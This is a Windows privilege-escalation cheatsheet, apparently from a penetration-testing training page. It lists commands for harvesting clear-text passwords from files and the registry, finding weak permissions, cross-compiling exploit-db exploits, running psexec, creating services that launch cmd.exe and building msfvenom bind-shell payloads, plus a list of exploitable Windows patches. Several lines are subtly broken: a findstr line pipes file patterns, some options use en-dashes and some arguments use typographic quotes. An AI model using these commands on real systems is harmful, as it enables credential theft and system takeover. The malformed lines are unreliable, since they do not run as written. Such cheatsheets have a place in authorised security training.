Useful? Check out our training :)

Penetration Testing 102 - Windows Privilege Escalation Cheatsheet

OS and service pack

• systeminfo | findstr /B /C:”OS Name” /C:”OS Version”

• ver

System name

• hostname

Who are you?

• whoami

• echo %username%

Finding other users

• net users

• net user username

Clear-text passwords

• c:\unattend.txt

• c:\sysprep.ini - [Clear Text]

• c:\sysprep\sysprep.xml - [Base64]

• findstr /si password *.txt | *.xml | *.ini

• reg query HKLM /s | findstr /i password > temp.txt

• reg query HKCU /s | findstr /i password > temp.txt

• reg query HKLM /f password /t REG_SZ /s

• reg query HKCU /f password /t REG_SZ /s

Finding weak directory permissions

• accesschk.exe /accepteula

• accesschk.exe -uwdqs users c:\

• accesschk.exe -uwdqs “Authenticated Users” c:\

Finding weak file permissions

• accesschk.exe -uwqs users c:\*.*

• accesschk.exe -uwqs “Authenticated Users” c:\*.*

• cacls "c:\Program Files" /T | findstr Users

Weak Service permissions

• accesschk.exe –uwcqv *

Cross compile exploits

• cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/

• cd /root/.wine/drive_c/MinGW/bin

• wine gcc –o w00t.exe /tmp/<exploit>.c -l lib

PSexec

• psexec.py <user>@<host> <cmd>

• psexec.exe \\<host> <cmd>

Services

• sc create <servicename> binpath= “c:\windows\system32\cmd.exe /k <pathtobinaryexecutable>” DisplayName= <displayname>

• sc start <servicename>

Creating bind shells

• msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>

• msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>

Privilege Escalation Exploits by Patch

• MS10-015

• MS10-059

• MS10-092

• MS11-080

• MS13-005

• CVE-2013-3660

• MS13-053

• MS13-081

• MS14-058

• MS14-068

• MS14-070

• MS15-001

• MS15-051

• MS15-052